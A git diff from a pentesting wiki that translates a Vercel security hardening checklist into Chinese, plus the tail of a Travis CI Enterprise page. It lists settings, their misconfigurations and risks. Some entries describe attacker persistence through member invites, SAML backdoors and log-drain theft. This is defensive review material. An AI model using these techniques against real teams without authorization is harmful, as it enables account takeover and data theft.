An infrastructure to deploy a Kubernetes cluster; it can be deployed in a server cluster or in a single machine if required -3. Depending on your setup, you may want to deploy and configure some of the components on your own, e.g., RabbitMQ - see the [Setting up Travis CI Enterprise](https://docs.travis-ci.com/user/enterprise/tcie-3.x-setting-up-travis-ci-enterprise/) for more details. +1. 一个 **PostgreSQL11**(或更高版本)数据库。 +2. 部署 Kubernetes 集群的基础设施;如果需要,可以在服务器集群中或单台机器上部署。 +3. 根据您的设置,您可能希望自行部署和配置某些组件,例如 RabbitMQ - 有关更多详细信息,请参见 [设置 Travis CI 企业版](https://docs.travis-ci.com/user/enterprise/tcie-3.x-setting-up-travis-ci-enterprise/)。 -**TCI Worker requires the following:** +**TCI 工作节点需要以下内容:** -1. An infrastructure where a docker image containing the **Worker and a linked build image can be deployed**. -2. Connectivity to certain Travis CI Core Services components - see the [Setting Up Worker](https://docs.travis-ci.com/user/enterprise/setting-up-worker/) for more details. +1. 一个基础设施,可以在其中部署包含 **工作节点和链接的构建镜像** 的 Docker 镜像。 +2. 连接到某些 Travis CI 核心服务组件 - 有关更多详细信息,请参见 [设置工作节点](https://docs.travis-ci.com/user/enterprise/setting-up-worker/)。 -The amount of deployed TCI Worker and build environment OS images will determine the total concurrent capacity of Travis CI Enterprise deployment in your infrastructure. +部署的 TCI 工作节点和构建环境操作系统镜像的数量将决定您基础设施中 Travis CI 企业版部署的总并发容量。 ![](<../../images/image (199).png>) {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/vercel-security.md b/src/pentesting-ci-cd/vercel-security.md index 16dc93da7..05d0a70bc 100644 --- a/src/pentesting-ci-cd/vercel-security.md +++ b/src/pentesting-ci-cd/vercel-security.md @@ -2,440 +2,436 @@ {{#include ../banners/hacktricks-training.md}} -## Basic Information +## 基本信息 -In Vercel a **Team** is the complete **environment** that belongs a client and a **project** is an **application**. +在 Vercel 中,**团队**是属于客户的完整 **环境**,而 **项目** 是一个 **应用程序**。 -For a hardening review of **Vercel** you need to ask for a user with **Viewer role permission** or at least **Project viewer permission over the projects** to check (in case you only need to check the projects and not the Team configuration also). +对于 **Vercel** 的加固审查,您需要请求具有 **查看者角色权限** 的用户,或者至少对项目具有 **项目查看者权限** 以进行检查(如果您只需要检查项目而不需要检查团队配置)。 -## Project Settings +## 项目设置 -### General +### 一般 -**Purpose:** Manage fundamental project settings such as project name, framework, and build configurations. +**目的:** 管理基本项目设置,如项目名称、框架和构建配置。 -#### Security Configurations: +#### 安全配置: -- **Transfer** - - **Misconfiguration:** Allows to transfer the project to another team - - **Risk:** An attacker could steal the project -- **Delete Project** - - **Misconfiguration:** Allows to delete the project - - **Risk:** Delete the prject +- **转移** +- **错误配置:** 允许将项目转移到另一个团队 +- **风险:** 攻击者可能会窃取项目 +- **删除项目** +- **错误配置:** 允许删除项目 +- **风险:** 删除项目 --- -### Domains +### 域名 -**Purpose:** Manage custom domains, DNS settings, and SSL configurations. +**目的:** 管理自定义域名、DNS 设置和 SSL 配置。 -#### Security Configurations: +#### 安全配置: -- **DNS Configuration Errors** - - **Misconfiguration:** Incorrect DNS records (A, CNAME) pointing to malicious servers. - - **Risk:** Domain hijacking, traffic interception, and phishing attacks. -- **SSL/TLS Certificate Management** - - **Misconfiguration:** Using weak or expired SSL/TLS certificates. - - **Risk:** Vulnerable to man-in-the-middle (MITM) attacks, compromising data integrity and confidentiality. 
-- **DNSSEC Implementation** - - **Misconfiguration:** Failing to enable DNSSEC or incorrect DNSSEC settings. - - **Risk:** Increased susceptibility to DNS spoofing and cache poisoning attacks. -- **Environment used per domain** - - **Misconfiguration:** Change the environment used by the domain in production. - - **Risk:** Expose potential secrets or functionalities taht shouldn't be available in production. +- **DNS 配置错误** +- **错误配置:** 指向恶意服务器的错误 DNS 记录(A、CNAME)。 +- **风险:** 域名劫持、流量拦截和网络钓鱼攻击。 +- **SSL/TLS 证书管理** +- **错误配置:** 使用弱或过期的 SSL/TLS 证书。 +- **风险:** 易受中间人(MITM)攻击,危及数据完整性和机密性。 +- **DNSSEC 实施** +- **错误配置:** 未能启用 DNSSEC 或 DNSSEC 设置不正确。 +- **风险:** 增加 DNS 欺骗和缓存投毒攻击的易受攻击性。 +- **每个域名使用的环境** +- **错误配置:** 更改生产中域名使用的环境。 +- **风险:** 暴露潜在的秘密或不应在生产中可用的功能。 --- -### Environments +### 环境 -**Purpose:** Define different environments (Development, Preview, Production) with specific settings and variables. +**目的:** 定义不同的环境(开发、预览、生产),并具有特定的设置和变量。 -#### Security Configurations: +#### 安全配置: -- **Environment Isolation** - - **Misconfiguration:** Sharing environment variables across environments. - - **Risk:** Leakage of production secrets into development or preview environments, increasing exposure. -- **Access to Sensitive Environments** - - **Misconfiguration:** Allowing broad access to production environments. - - **Risk:** Unauthorized changes or access to live applications, leading to potential downtimes or data breaches. +- **环境隔离** +- **错误配置:** 在不同环境之间共享环境变量。 +- **风险:** 生产秘密泄露到开发或预览环境中,增加暴露风险。 +- **对敏感环境的访问** +- **错误配置:** 允许对生产环境的广泛访问。 +- **风险:** 未经授权的更改或访问实时应用程序,导致潜在的停机或数据泄露。 --- -### Environment Variables +### 环境变量 -**Purpose:** Manage environment-specific variables and secrets used by the application. +**目的:** 管理应用程序使用的特定于环境的变量和秘密。 -#### Security Configurations: +#### 安全配置: -- **Exposing Sensitive Variables** - - **Misconfiguration:** Prefixing sensitive variables with `NEXT_PUBLIC_`, making them accessible on the client side. - - **Risk:** Exposure of API keys, database credentials, or other sensitive data to the public, leading to data breaches. -- **Sensitive disabled** - - **Misconfiguration:** If disabled (default) it's possible to read the values of the generated secrets. - - **Risk:** Increased likelihood of accidental exposure or unauthorized access to sensitive information. -- **Shared Environment Variables** - - **Misconfiguration:** These are env variables set at Team level and could also contain sensitive information. - - **Risk:** Increased likelihood of accidental exposure or unauthorized access to sensitive information. +- **暴露敏感变量** +- **错误配置:** 用 `NEXT_PUBLIC_` 前缀敏感变量,使其在客户端可访问。 +- **风险:** API 密钥、数据库凭据或其他敏感数据暴露给公众,导致数据泄露。 +- **敏感禁用** +- **错误配置:** 如果禁用(默认),则可以读取生成的秘密的值。 +- **风险:** 意外暴露或未经授权访问敏感信息的可能性增加。 +- **共享环境变量** +- **错误配置:** 这些是在团队级别设置的环境变量,也可能包含敏感信息。 +- **风险:** 意外暴露或未经授权访问敏感信息的可能性增加。 --- ### Git -**Purpose:** Configure Git repository integrations, branch protections, and deployment triggers. +**目的:** 配置 Git 存储库集成、分支保护和部署触发器。 -#### Security Configurations: +#### 安全配置: -- **Ignored Build Step (TODO)** - - **Misconfiguration:** It looks like this option allows to configure a bash script/commands that will be executed when a new commit is pushed in Github, which could allow RCE. - - **Risk:** TBD +- **忽略构建步骤(TODO)** +- **错误配置:** 这个选项似乎允许配置一个 bash 脚本/命令,当在 Github 中推送新提交时执行,这可能允许 RCE。 +- **风险:** 待定 --- -### Integrations +### 集成 -**Purpose:** Connect third-party services and tools to enhance project functionalities. 
+**目的:** 连接第三方服务和工具以增强项目功能。 -#### Security Configurations: +#### 安全配置: -- **Insecure Third-Party Integrations** - - **Misconfiguration:** Integrating with untrusted or insecure third-party services. - - **Risk:** Introduction of vulnerabilities, data leaks, or backdoors through compromised integrations. -- **Over-Permissioned Integrations** - - **Misconfiguration:** Granting excessive permissions to integrated services. - - **Risk:** Unauthorized access to project resources, data manipulation, or service disruptions. -- **Lack of Integration Monitoring** - - **Misconfiguration:** Failing to monitor and audit third-party integrations. - - **Risk:** Delayed detection of compromised integrations, increasing the potential impact of security breaches. +- **不安全的第三方集成** +- **错误配置:** 与不受信任或不安全的第三方服务集成。 +- **风险:** 通过被破坏的集成引入漏洞、数据泄露或后门。 +- **过度授权的集成** +- **错误配置:** 授予集成服务过多的权限。 +- **风险:** 未经授权访问项目资源、数据操纵或服务中断。 +- **缺乏集成监控** +- **错误配置:** 未能监控和审计第三方集成。 +- **风险:** 延迟检测被破坏的集成,增加安全漏洞的潜在影响。 --- -### Deployment Protection +### 部署保护 -**Purpose:** Secure deployments through various protection mechanisms, controlling who can access and deploy to your environments. +**目的:** 通过各种保护机制确保部署安全,控制谁可以访问和部署到您的环境。 -#### Security Configurations: +#### 安全配置: -**Vercel Authentication** +**Vercel 身份验证** -- **Misconfiguration:** Disabling authentication or not enforcing team member checks. -- **Risk:** Unauthorized users can access deployments, leading to data breaches or application misuse. +- **错误配置:** 禁用身份验证或未强制执行团队成员检查。 +- **风险:** 未经授权的用户可以访问部署,导致数据泄露或应用程序滥用。 -**Protection Bypass for Automation** +**自动化的保护绕过** -- **Misconfiguration:** Exposing the bypass secret publicly or using weak secrets. -- **Risk:** Attackers can bypass deployment protections, accessing and manipulating protected deployments. +- **错误配置:** 公开绕过秘密或使用弱秘密。 +- **风险:** 攻击者可以绕过部署保护,访问和操纵受保护的部署。 -**Shareable Links** +**可分享链接** -- **Misconfiguration:** Sharing links indiscriminately or failing to revoke outdated links. -- **Risk:** Unauthorized access to protected deployments, bypassing authentication and IP restrictions. +- **错误配置:** 不加选择地分享链接或未能撤销过期链接。 +- **风险:** 未经授权访问受保护的部署,绕过身份验证和 IP 限制。 -**OPTIONS Allowlist** +**OPTIONS 允许列表** -- **Misconfiguration:** Allowlisting overly broad paths or sensitive endpoints. -- **Risk:** Attackers can exploit unprotected paths to perform unauthorized actions or bypass security checks. +- **错误配置:** 允许过于宽泛的路径或敏感端点。 +- **风险:** 攻击者可以利用未保护的路径执行未经授权的操作或绕过安全检查。 -**Password Protection** +**密码保护** -- **Misconfiguration:** Using weak passwords or sharing them insecurely. -- **Risk:** Unauthorized access to deployments if passwords are guessed or leaked. -- **Note:** Available on the **Pro** plan as part of **Advanced Deployment Protection** for an additional $150/month. +- **错误配置:** 使用弱密码或不安全地共享密码。 +- **风险:** 如果密码被猜测或泄露,可能导致未经授权访问部署。 +- **注意:** 在 **Pro** 计划中作为 **高级部署保护** 的一部分提供,额外收费 $150/月。 -**Deployment Protection Exceptions** +**部署保护例外** -- **Misconfiguration:** Adding production or sensitive domains to the exception list inadvertently. -- **Risk:** Exposure of critical deployments to the public, leading to data leaks or unauthorized access. -- **Note:** Available on the **Pro** plan as part of **Advanced Deployment Protection** for an additional $150/month. +- **错误配置:** 不小心将生产或敏感域添加到例外列表。 +- **风险:** 关键部署暴露给公众,导致数据泄露或未经授权访问。 +- **注意:** 在 **Pro** 计划中作为 **高级部署保护** 的一部分提供,额外收费 $150/月。 -**Trusted IPs** +**受信任的 IP** -- **Misconfiguration:** Incorrectly specifying IP addresses or CIDR ranges. 
-- **Risk:** Legitimate users being blocked or unauthorized IPs gaining access. -- **Note:** Available on the **Enterprise** plan. +- **错误配置:** 不正确地指定 IP 地址或 CIDR 范围。 +- **风险:** 合法用户被阻止或未经授权的 IP 获得访问。 +- **注意:** 在 **Enterprise** 计划中提供。 --- -### Functions +### 函数 -**Purpose:** Configure serverless functions, including runtime settings, memory allocation, and security policies. +**目的:** 配置无服务器函数,包括运行时设置、内存分配和安全策略。 -#### Security Configurations: +#### 安全配置: -- **Nothing** +- **无** --- -### Data Cache +### 数据缓存 -**Purpose:** Manage caching strategies and settings to optimize performance and control data storage. +**目的:** 管理缓存策略和设置,以优化性能和控制数据存储。 -#### Security Configurations: +#### 安全配置: -- **Purge Cache** - - **Misconfiguration:** It allows to delete all the cache. - - **Risk:** Unauthorized users deleting the cache leading to a potential DoS. +- **清除缓存** +- **错误配置:** 允许删除所有缓存。 +- **风险:** 未经授权的用户删除缓存,导致潜在的 DoS。 --- -### Cron Jobs +### 定时任务 -**Purpose:** Schedule automated tasks and scripts to run at specified intervals. +**目的:** 安排自动化任务和脚本在指定时间间隔运行。 -#### Security Configurations: +#### 安全配置: -- **Disable Cron Job** - - **Misconfiguration:** It allows to disable cron jobs declared inside the code - - **Risk:** Potential interruption of the service (depending on what the cron jobs were meant for) +- **禁用定时任务** +- **错误配置:** 允许禁用代码中声明的定时任务。 +- **风险:** 服务潜在中断(取决于定时任务的目的) --- -### Log Drains +### 日志排水 -**Purpose:** Configure external logging services to capture and store application logs for monitoring and auditing. +**目的:** 配置外部日志服务以捕获和存储应用程序日志以进行监控和审计。 -#### Security Configurations: +#### 安全配置: -- Nothing (managed from teams settings) +- 无(由团队设置管理) --- -### Security +### 安全 -**Purpose:** Central hub for various security-related settings affecting project access, source protection, and more. +**目的:** 各种影响项目访问、源保护等的安全相关设置的中央中心。 -#### Security Configurations: +#### 安全配置: -**Build Logs and Source Protection** +**构建日志和源保护** -- **Misconfiguration:** Disabling protection or exposing `/logs` and `/src` paths publicly. -- **Risk:** Unauthorized access to build logs and source code, leading to information leaks and potential exploitation of vulnerabilities. +- **错误配置:** 禁用保护或公开 `/logs` 和 `/src` 路径。 +- **风险:** 未经授权访问构建日志和源代码,导致信息泄露和潜在漏洞利用。 -**Git Fork Protection** +**Git Fork 保护** -- **Misconfiguration:** Allowing unauthorized pull requests without proper reviews. -- **Risk:** Malicious code can be merged into the codebase, introducing vulnerabilities or backdoors. +- **错误配置:** 允许未经授权的拉取请求而没有适当的审查。 +- **风险:** 恶意代码可能被合并到代码库中,引入漏洞或后门。 -**Secure Backend Access with OIDC Federation** +**使用 OIDC 联邦安全后端访问** -- **Misconfiguration:** Incorrectly setting up OIDC parameters or using insecure issuer URLs. -- **Risk:** Unauthorized access to backend services through flawed authentication flows. +- **错误配置:** 错误设置 OIDC 参数或使用不安全的发行者 URL。 +- **风险:** 通过错误的身份验证流程未经授权访问后端服务。 -**Deployment Retention Policy** +**部署保留策略** -- **Misconfiguration:** Setting retention periods too short (losing deployment history) or too long (unnecessary data retention). -- **Risk:** Inability to perform rollbacks when needed or increased risk of data exposure from old deployments. +- **错误配置:** 设置保留期限过短(丢失部署历史)或过长(不必要的数据保留)。 +- **风险:** 在需要时无法执行回滚,或由于旧部署增加数据暴露风险。 -**Recently Deleted Deployments** +**最近删除的部署** -- **Misconfiguration:** Not monitoring deleted deployments or relying solely on automated deletions. -- **Risk:** Loss of critical deployment history, hindering audits and rollbacks. 
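For the Build Logs and Source Protection item above, a quick unauthenticated probe against a deployment URL shows whether those paths answer without a Vercel session (the hostname below is a placeholder and the exact path variants may differ per project):

```bash
for p in /logs /src /_logs /_src; do
  printf '%s -> ' "$p"
  curl -s -o /dev/null -w '%{http_code}\n' "https://my-app-team.vercel.app$p"
done
```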
+- **错误配置:** 不监控已删除的部署或仅依赖自动删除。 +- **风险:** 丢失关键部署历史,妨碍审计和回滚。 --- -### Advanced +### 高级 -**Purpose:** Access to additional project settings for fine-tuning configurations and enhancing security. +**目的:** 访问额外的项目设置,以微调配置和增强安全性。 -#### Security Configurations: +#### 安全配置: -**Directory Listing** +**目录列表** -- **Misconfiguration:** Enabling directory listing allows users to view directory contents without an index file. -- **Risk:** Exposure of sensitive files, application structure, and potential entry points for attacks. +- **错误配置:** 启用目录列表允许用户在没有索引文件的情况下查看目录内容。 +- **风险:** 暴露敏感文件、应用程序结构和潜在攻击入口。 --- -## Project Firewall +## 项目防火墙 -### Firewall +### 防火墙 -#### Security Configurations: +#### 安全配置: -**Enable Attack Challenge Mode** +**启用攻击挑战模式** -- **Misconfiguration:** Enabling this improves the defenses of the web application against DoS but at the cost of usability -- **Risk:** Potential user experience problems. +- **错误配置:** 启用此功能提高了 Web 应用程序对 DoS 的防御,但以可用性为代价。 +- **风险:** 潜在的用户体验问题。 -### Custom Rules & IP Blocking +### 自定义规则和 IP 阻止 -- **Misconfiguration:** Allows to unblock/block traffic -- **Risk:** Potential DoS allowing malicious traffic or blocking benign traffic +- **错误配置:** 允许解除/阻止流量。 +- **风险:** 潜在的 DoS 允许恶意流量或阻止良性流量。 --- -## Project Deployment +## 项目部署 -### Source +### 源 -- **Misconfiguration:** Allows access to read the complete source code of the application -- **Risk:** Potential exposure of sensitive information +- **错误配置:** 允许访问读取应用程序的完整源代码。 +- **风险:** 潜在暴露敏感信息。 -### Skew Protection +### 偏差保护 -- **Misconfiguration:** This protection ensures the client and server application are always using the same version so there is no desynchronizations were the client uses a different version from the server and therefore they don't understand each other. -- **Risk:** Disabling this (if enabled) could cause DoS problems in new deployments in the future +- **错误配置:** 此保护确保客户端和服务器应用程序始终使用相同版本,因此不会出现客户端使用与服务器不同版本的不同步情况。 +- **风险:** 禁用此功能(如果启用)可能导致未来新部署中的 DoS 问题。 --- -## Team Settings +## 团队设置 -### General +### 一般 -#### Security Configurations: +#### 安全配置: -- **Transfer** - - **Misconfiguration:** Allows to transfer all the projects to another team - - **Risk:** An attacker could steal the projects -- **Delete Project** - - **Misconfiguration:** Allows to delete the team with all the projects - - **Risk:** Delete the projects +- **转移** +- **错误配置:** 允许将所有项目转移到另一个团队。 +- **风险:** 攻击者可能会窃取项目。 +- **删除项目** +- **错误配置:** 允许删除团队及其所有项目。 +- **风险:** 删除项目。 --- -### Billing +### 计费 -#### Security Configurations: +#### 安全配置: -- **Speed Insights Cost Limit** - - **Misconfiguration:** An attacker could increase this number - - **Risk:** Increased costs +- **速度洞察成本限制** +- **错误配置:** 攻击者可能会增加此数字。 +- **风险:** 成本增加。 --- -### Members +### 成员 -#### Security Configurations: +#### 安全配置: -- **Add members** - - **Misconfiguration:** An attacker could maintain persitence inviting an account he control - - **Risk:** Attacker persistence -- **Roles** - - **Misconfiguration:** Granting too many permissions to people that doesn't need it increases the risk of the vercel configuration. 
Check all the possible roles in [https://vercel.com/docs/accounts/team-members-and-roles/access-roles](https://vercel.com/docs/accounts/team-members-and-roles/access-roles) - - **Risk**: Increate the exposure of the Vercel Team +- **添加成员** +- **错误配置:** 攻击者可能会通过邀请他控制的帐户来维持持久性。 +- **风险:** 攻击者持久性。 +- **角色** +- **错误配置:** 授予不需要的人员过多权限增加了 Vercel 配置的风险。检查所有可能的角色 [https://vercel.com/docs/accounts/team-members-and-roles/access-roles](https://vercel.com/docs/accounts/team-members-and-roles/access-roles)。 +- **风险:** 增加 Vercel 团队的暴露。 --- -### Access Groups +### 访问组 -An **Access Group** in Vercel is a collection of projects and team members with predefined role assignments, enabling centralized and streamlined access management across multiple projects. +在 Vercel 中,**访问组**是具有预定义角色分配的项目和团队成员的集合,能够在多个项目之间实现集中和简化的访问管理。 -**Potential Misconfigurations:** +**潜在错误配置:** -- **Over-Permissioning Members:** Assigning roles with more permissions than necessary, leading to unauthorized access or actions. -- **Improper Role Assignments:** Incorrectly assigning roles that do not align with team members' responsibilities, causing privilege escalation. -- **Lack of Project Segregation:** Failing to separate sensitive projects, allowing broader access than intended. -- **Insufficient Group Management:** Not regularly reviewing or updating Access Groups, resulting in outdated or inappropriate access permissions. -- **Inconsistent Role Definitions:** Using inconsistent or unclear role definitions across different Access Groups, leading to confusion and security gaps. +- **过度授权成员:** 分配的角色权限超过必要,导致未经授权的访问或操作。 +- **不当角色分配:** 错误分配与团队成员职责不符的角色,导致特权升级。 +- **缺乏项目隔离:** 未能分离敏感项目,允许比预期更广泛的访问。 +- **管理不足的组:** 未定期审查或更新访问组,导致过时或不当的访问权限。 +- **不一致的角色定义:** 在不同访问组中使用不一致或不清晰的角色定义,导致混淆和安全漏洞。 --- -### Log Drains +### 日志排水 -#### Security Configurations: +#### 安全配置: -- **Log Drains to third parties:** - - **Misconfiguration:** An attacker could configure a Log Drain to steal the logs - - **Risk:** Partial persistence +- **向第三方的日志排水:** +- **错误配置:** 攻击者可能会配置日志排水以窃取日志。 +- **风险:** 部分持久性。 --- -### Security & Privacy +### 安全与隐私 -#### Security Configurations: +#### 安全配置: -- **Team Email Domain:** When configured, this setting automatically invites Vercel Personal Accounts with email addresses ending in the specified domain (e.g., `mydomain.com`) to join your team upon signup and on the dashboard. - - **Misconfiguration:** - - Specifying the wrong email domain or a misspelled domain in the Team Email Domain setting. - - Using a common email domain (e.g., `gmail.com`, `hotmail.com`) instead of a company-specific domain. - - **Risks:** - - **Unauthorized Access:** Users with email addresses from unintended domains may receive invitations to join your team. - - **Data Exposure:** Potential exposure of sensitive project information to unauthorized individuals. -- **Protected Git Scopes:** Allows you to add up to 5 Git scopes to your team to prevent other Vercel teams from deploying repositories from the protected scope. Multiple teams can specify the same scope, allowing both teams access. - - **Misconfiguration:** Not adding critical Git scopes to the protected list. -- **Risks:** - - **Unauthorized Deployments:** Other teams may deploy repositories from your organization's Git scopes without authorization. - - **Intellectual Property Exposure:** Proprietary code could be deployed and accessed outside your team. -- **Environment Variable Policies:** Enforces policies for the creation and editing of the team's environment variables. 
Specifically, you can enforce that all environment variables are created as **Sensitive Environment Variables**, which can only be decrypted by Vercel's deployment system. - - **Misconfiguration:** Keeping the enforcement of sensitive environment variables disabled. - - **Risks:** - - **Exposure of Secrets:** Environment variables may be viewed or edited by unauthorized team members. - - **Data Breach:** Sensitive information like API keys and credentials could be leaked. -- **Audit Log:** Provides an export of the team's activity for up to the last 90 days. Audit logs help in monitoring and tracking actions performed by team members. - - **Misconfiguration:**\ - Granting access to audit logs to unauthorized team members. - - **Risks:** - - **Privacy Violations:** Exposure of sensitive user activities and data. - - **Tampering with Logs:** Malicious actors could alter or delete logs to cover their tracks. -- **SAML Single Sign-On:** Allows customization of SAML authentication and directory syncing for your team, enabling integration with an Identity Provider (IdP) for centralized authentication and user management. - - **Misconfiguration:** An attacker could backdoor the Team setting up SAML parameters such as Entity ID, SSO URL, or certificate fingerprints. - - **Risk:** Maintain persistence -- **IP Address Visibility:** Controls whether IP addresses, which may be considered personal information under certain data protection laws, are displayed in Monitoring queries and Log Drains. - - **Misconfiguration:** Leaving IP address visibility enabled without necessity. - - **Risks:** - - **Privacy Violations:** Non-compliance with data protection regulations like GDPR. - - **Legal Repercussions:** Potential fines and penalties for mishandling personal data. -- **IP Blocking:** Allows the configuration of IP addresses and CIDR ranges that Vercel should block requests from. Blocked requests do not contribute to your billing. - - **Misconfiguration:** Could be abused by an attacker to allow malicious traffic or block legit traffic. - - **Risks:** - - **Service Denial to Legitimate Users:** Blocking access for valid users or partners. - - **Operational Disruptions:** Loss of service availability for certain regions or clients. 
+- **团队电子邮件域:** 配置后,此设置会自动邀请以指定域(例如 `mydomain.com`)结尾的 Vercel 个人帐户在注册时和仪表板上加入您的团队。 +- **错误配置:** +- 指定错误的电子邮件域或在团队电子邮件域设置中拼写错误的域。 +- 使用常见电子邮件域(例如 `gmail.com`、`hotmail.com`)而不是公司特定域。 +- **风险:** +- **未经授权的访问:** 来自意外域的用户可能会收到加入您团队的邀请。 +- **数据暴露:** 潜在暴露敏感项目信息给未经授权的个人。 +- **受保护的 Git 范围:** 允许您为团队添加最多 5 个 Git 范围,以防止其他 Vercel 团队从受保护范围部署存储库。多个团队可以指定相同的范围,允许两个团队访问。 +- **错误配置:** 未将关键 Git 范围添加到受保护列表。 +- **风险:** +- **未经授权的部署:** 其他团队可能未经授权从您组织的 Git 范围部署存储库。 +- **知识产权暴露:** 专有代码可能被部署并在您的团队之外访问。 +- **环境变量策略:** 强制执行团队环境变量的创建和编辑策略。具体而言,您可以强制所有环境变量作为 **敏感环境变量** 创建,这只能由 Vercel 的部署系统解密。 +- **错误配置:** 保持对敏感环境变量的强制执行禁用。 +- **风险:** +- **秘密暴露:** 环境变量可能被未经授权的团队成员查看或编辑。 +- **数据泄露:** 敏感信息如 API 密钥和凭据可能被泄露。 +- **审计日志:** 提供团队活动的导出,最长可达 90 天。审计日志有助于监控和跟踪团队成员执行的操作。 +- **错误配置:**\ +授予未经授权的团队成员访问审计日志的权限。 +- **风险:** +- **隐私侵犯:** 暴露敏感用户活动和数据。 +- **篡改日志:** 恶意行为者可能会更改或删除日志以掩盖其踪迹。 +- **SAML 单点登录:** 允许为您的团队自定义 SAML 身份验证和目录同步,支持与身份提供者(IdP)集成以实现集中身份验证和用户管理。 +- **错误配置:** 攻击者可能会在设置 SAML 参数(如实体 ID、SSO URL 或证书指纹)时后门团队。 +- **风险:** 维持持久性。 +- **IP 地址可见性:** 控制 IP 地址是否在监控查询和日志排水中显示,这在某些数据保护法律下可能被视为个人信息。 +- **错误配置:** 在没有必要的情况下保持 IP 地址可见性启用。 +- **风险:** +- **隐私侵犯:** 不符合数据保护法规(如 GDPR)。 +- **法律后果:** 由于处理个人数据不当而可能面临罚款和处罚。 +- **IP 阻止:** 允许配置 Vercel 应该阻止请求的 IP 地址和 CIDR 范围。被阻止的请求不会计入您的账单。 +- **错误配置:** 可能被攻击者滥用以允许恶意流量或阻止合法流量。 +- **风险:** +- **对合法用户的服务拒绝:** 阻止有效用户或合作伙伴的访问。 +- **操作中断:** 某些地区或客户的服务可用性丧失。 --- -### Secure Compute +### 安全计算 -**Vercel Secure Compute** enables secure, private connections between Vercel Functions and backend environments (e.g., databases) by establishing isolated networks with dedicated IP addresses. This eliminates the need to expose backend services publicly, enhancing security, compliance, and privacy. +**Vercel 安全计算** 通过建立具有专用 IP 地址的隔离网络,启用 Vercel 函数与后端环境(例如数据库)之间的安全、私密连接。这消除了公开暴露后端服务的需要,增强了安全性、合规性和隐私。 -#### **Potential Misconfigurations and Risks** +#### **潜在错误配置和风险** -1. **Incorrect AWS Region Selection** - - **Misconfiguration:** Choosing an AWS region for the Secure Compute network that doesn't match the backend services' region. - - **Risk:** Increased latency, potential data residency compliance issues, and degraded performance. -2. **Overlapping CIDR Blocks** - - **Misconfiguration:** Selecting CIDR blocks that overlap with existing VPCs or other networks. - - **Risk:** Network conflicts leading to failed connections, unauthorized access, or data leakage between networks. -3. **Improper VPC Peering Configuration** - - **Misconfiguration:** Incorrectly setting up VPC peering (e.g., wrong VPC IDs, incomplete route table updates). - - **Risk:** Unauthorized access to backend infrastructure, failed secure connections, and potential data breaches. -4. **Excessive Project Assignments** - - **Misconfiguration:** Assigning multiple projects to a single Secure Compute network without proper isolation. - - **Risk:** Shared IP exposure increases the attack surface, potentially allowing compromised projects to affect others. -5. **Inadequate IP Address Management** - - **Misconfiguration:** Failing to manage or rotate dedicated IP addresses appropriately. - - **Risk:** IP spoofing, tracking vulnerabilities, and potential blacklisting if IPs are associated with malicious activities. -6. **Including Build Containers Unnecessarily** - - **Misconfiguration:** Adding build containers to the Secure Compute network when backend access isn't required during builds. - - **Risk:** Expanded attack surface, increased provisioning delays, and unnecessary consumption of network resources. -7. 
**Failure to Securely Handle Bypass Secrets** - - **Misconfiguration:** Exposing or mishandling secrets used to bypass deployment protections. - - **Risk:** Unauthorized access to protected deployments, allowing attackers to manipulate or deploy malicious code. -8. **Ignoring Region Failover Configurations** - - **Misconfiguration:** Not setting up passive failover regions or misconfiguring failover settings. - - **Risk:** Service downtime during primary region outages, leading to reduced availability and potential data inconsistency. -9. **Exceeding VPC Peering Connection Limits** - - **Misconfiguration:** Attempting to establish more VPC peering connections than the allowed limit (e.g., exceeding 50 connections). - - **Risk:** Inability to connect necessary backend services securely, causing deployment failures and operational disruptions. -10. **Insecure Network Settings** - - **Misconfiguration:** Weak firewall rules, lack of encryption, or improper network segmentation within the Secure Compute network. - - **Risk:** Data interception, unauthorized access to backend services, and increased vulnerability to attacks. +1. **错误的 AWS 区域选择** +- **错误配置:** 为安全计算网络选择的 AWS 区域与后端服务的区域不匹配。 +- **风险:** 延迟增加、潜在的数据驻留合规性问题和性能下降。 +2. **重叠的 CIDR 块** +- **错误配置:** 选择与现有 VPC 或其他网络重叠的 CIDR 块。 +- **风险:** 网络冲突导致连接失败、未经授权访问或网络间数据泄露。 +3. **不当的 VPC 对等配置** +- **错误配置:** 错误设置 VPC 对等(例如,错误的 VPC ID、未完成的路由表更新)。 +- **风险:** 通过错误的身份验证流程未经授权访问后端基础设施、连接失败和潜在的数据泄露。 +4. **过多的项目分配** +- **错误配置:** 在没有适当隔离的情况下将多个项目分配给单个安全计算网络。 +- **风险:** 共享 IP 暴露增加攻击面,可能允许被破坏的项目影响其他项目。 +5. **不充分的 IP 地址管理** +- **错误配置:** 未能适当管理或轮换专用 IP 地址。 +- **风险:** IP 欺骗、跟踪漏洞和如果 IP 与恶意活动相关联则可能被列入黑名单。 +6. **不必要地包含构建容器** +- **错误配置:** 在构建期间不需要后端访问时将构建容器添加到安全计算网络。 +- **风险:** 扩大攻击面、增加配置延迟和不必要的网络资源消耗。 +7. **未能安全处理绕过秘密** +- **错误配置:** 暴露或错误处理用于绕过部署保护的秘密。 +- **风险:** 未经授权访问受保护的部署,允许攻击者操纵或部署恶意代码。 +8. **忽视区域故障转移配置** +- **错误配置:** 未设置被动故障转移区域或错误配置故障转移设置。 +- **风险:** 在主要区域故障期间服务停机,导致可用性降低和潜在的数据不一致。 +9. **超过 VPC 对等连接限制** +- **错误配置:** 尝试建立超过允许限制的 VPC 对等连接(例如,超过 50 个连接)。 +- **风险:** 无法安全连接必要的后端服务,导致部署失败和操作中断。 +10. **不安全的网络设置** +- **错误配置:** 弱防火墙规则、缺乏加密或安全计算网络内的不当网络分段。 +- **风险:** 数据拦截、未经授权访问后端服务和增加攻击的脆弱性。 --- -### Environment Variables +### 环境变量 -**Purpose:** Manage environment-specific variables and secrets used by all the projects. +**目的:** 管理所有项目使用的特定于环境的变量和秘密。 -#### Security Configurations: +#### 安全配置: -- **Exposing Sensitive Variables** - - **Misconfiguration:** Prefixing sensitive variables with `NEXT_PUBLIC_`, making them accessible on the client side. - - **Risk:** Exposure of API keys, database credentials, or other sensitive data to the public, leading to data breaches. -- **Sensitive disabled** - - **Misconfiguration:** If disabled (default) it's possible to read the values of the generated secrets. - - **Risk:** Increased likelihood of accidental exposure or unauthorized access to sensitive information. 
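To spot the `NEXT_PUBLIC_` exposure described above while reviewing a project, grepping for the prefix is usually enough, since anything matching is shipped to the client side (the file globs below are illustrative):

```bash
# Any hit here ends up in the browser bundle and must not contain secrets
grep -rn "NEXT_PUBLIC_" .env* next.config.* src/ 2>/dev/null
```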
